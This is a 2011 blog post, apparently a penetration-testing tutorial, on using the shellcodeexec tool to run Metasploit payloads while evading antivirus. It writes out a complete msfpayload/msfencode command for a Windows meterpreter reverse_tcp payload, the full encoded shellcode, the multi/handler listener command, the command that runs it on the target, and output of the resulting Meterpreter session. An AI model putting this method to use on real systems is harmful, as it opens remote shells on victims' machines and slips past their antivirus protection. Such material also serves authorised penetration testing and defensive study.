2011
04.22

Execute Metasploit Payloads using ShellCodeExec

Category: Malware, PenTest, Tools, Tutorials / Tag:  / Add Comment
According to Damel Bernardo’s Blog, this is another good way to bypass any antivirus protection.

Let’s see how it works!

Features

shellcodeexec:

  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

Example

1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:

Select All Code:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
 
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA

2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:

Select All Code:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:

Select All Code:
C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA

If you head back to the terminal where the multi/handler is running you will happily see:

Select All Code:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E
[*] Please wait while we load the module tree...
 
[...]
 
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 673 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12306 updated 7 days ago (2011.04.07)
 
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 4444
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011
 
meterpreter > sysinfo
System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32

The tool along with compilation files for POSIX and Windows systems can be found at https://github.com/inquisb/shellcodeexec.

[source]

VN:F [1.9.14_1148]
Rating: 5.0/5 (2 votes cast)
VN:F [1.9.14_1148]
Rating: +1 (from 1 vote)
Execute Metasploit Payloads using ShellCodeExec, 5.0 out of 5 based on 2 ratings

Related posts:

  1. [Shellcode] Download and Execute for Windows 7
  2. Maintaining Access and Cleaning logs using Metasploit
  3. Exploit DLL Vulnerability with Autorun and Metasploit on Windows
  4. Exploiting the WebDAV Vulnerability
  5. Reverse SSL backdoor with socat and metasploit (the alternative way)

No Comment.

Add Your Comment

Your Comment

Get Adobe Flash playerPlugin by wpburn.com wordpress themes